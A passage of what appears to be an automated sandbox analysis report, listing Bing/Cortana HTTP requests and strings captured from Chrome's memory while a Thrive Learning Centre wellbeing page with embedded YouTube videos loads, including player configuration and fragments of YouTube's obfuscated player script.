01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
                                  Source: global trafficHTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /apc/trans.gif?64d45b2e0b5acbfe07e333093de52a06 HTTP/1.1host: l-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                  Source: global trafficHTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: text/html,$Science of THRIVE Approach - YouTubeE=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: text/html,$Welcome to Thrive Learning - YouTubeE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Approach to Wellbeing</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div><div class=\"tlc-videos2\"><p>How can you tap into your own Fountain of Health? Watch below:</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div><div class=\"tlc-videos3\"><p><span><strong>Dr. John Chiasson </strong></span>shares evidence and Thrive Learning Centre resources.</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div></div></div></div>\n \n </section>\n\n<section class=\"block block-block-content block-block-contentf966ba8c-fc24-474a-8805-f39f333363d9 clearfix\">\n \n \n\n \n <div class=\"field field--name-body field--type-text-with-summary field--label-hidden field--item\"><div class=\"thrive-apprpach-img\"><p><img src=\"/sites/default/files/inline-images/leaves-banner-2_0_0.jpg\" data-entity-uuid=\"863dde25-bef3-486b-910c-2ecf2d16be0f\" data-entity-type=\"file\" width=\"2185\" height=\"305\"></p></div><div class=\"container tlc-wellbeing\"><div><div class=\"tlc-wellbeing-b2\"><h4>What is the THRIVE equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HPX*"https://www.facebook.com/FOHThrive equals www.facebook.com (Facebook)
                                  Source: chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: PX`5-https://www.youtube.com/@fountainofhealth2679 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}e} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2393613989.000028EC04B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "auth"||B.details.rc!=="429"?B.errorCode==="ump.spsrejectfailure"&&(h="HTML5_SPS_UMP_STATUS_REJECTED"):(h="TOO_MANY_REQUESTS",W="6");this.iO.jD(B.errorCode,B.severity,h,Q_(B.details),W)}else this.iO.publish("nonfatalerror",B),R=/^pp/.test(this.videoData.clientPlaybackNonce),this.h0(B.errorCode,B.details),R&&B.errorCode==="manifest.net.connect"&&(B="https://www.youtube.com/generate_204?cpn="+this.videoData.clientPlaybackNonce+"&t="+(0,g.f)(),MP(B,"manifest",function(b){z.X=!0;z.OE("pathprobe",b)}, equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2482855525.000028EC03537000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: "clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,51010235,51063643,51098299,51176511,51204329,51222973,51237842,51313767,51340662,51349914,51353393,51354083,51366423,51375647,51389629,51397332,51404808,51404810,51410964,51411
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: "currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":fal equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 'use strict';var Y='prototype;scheme;push;slice;startsWith;W;Hm6v;split;;length;get;U;=;rr;join;/api/manifest;/initplayback;T;indexOf;set;clone;fvip;path;sp;ug;Untrusted URL;file;Y;fallback_count;toString;match;s;url;signatureCipher;else;youtube.player.web_20250519_22_RC00;n;cmo=;reverse;,(,}/";Tx;/;Pu;local;http://local;smRLl34tByYhJ4B--H-_w8_;fromCharCode;splice;kO;mn;&;unshift;assign;forEach;---;pow;1970-01-01T01:32:36.000+01:30;/videoplayback;pop;ql;https://local;/file/index.m3u8;://;:;index.m3u8;1969-12-31T15:45:03.000-08:15;Nt;r;//;?;1970-01-01T02:45:02.000+02:45;cmo=td;1;www.youtube.com;%3D;1969-12-31T20:15:16.000-03:45;1969-12-31T20:00:04.000-04:00;rr?[1-9].*\\.c\\.youtube\\.com$;replace;,;\\.a1\\.googlevideo\\.com$;playerfallback;cmo=pf;1969-12-31T17:30:53.000-06:30;\\.googlevideo\\.com$;nG;redirector.googlevideo.com;cmo;\u2267/;a1.googlevideo.com;undefined'.split(";"), equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ( _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: ( http://localhost:64111/tabstatus//www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ("currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":fal equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: (42783B83FBBChttps://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: (essageHandlerhttps://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: (f/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: (https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX" equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: (stAnimationFrame(functin(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: (te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495235628.000028EC047BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377119871.000028EC03B70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487353472.000028EC03B73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: (www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2370314019.000028EC062A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: +xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2370314019.000028EC062A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: +xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false}uEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340748270.000028EC06CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ,I=a(93,this),I.length>0&&U(k(I.length,2).concat(I),this,498,147),U(k(this.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340748270.000028EC06CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ,I=a(93,this),I.length>0&&U(k(I.length,2).concat(I),this,498,147),U(k(this.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new 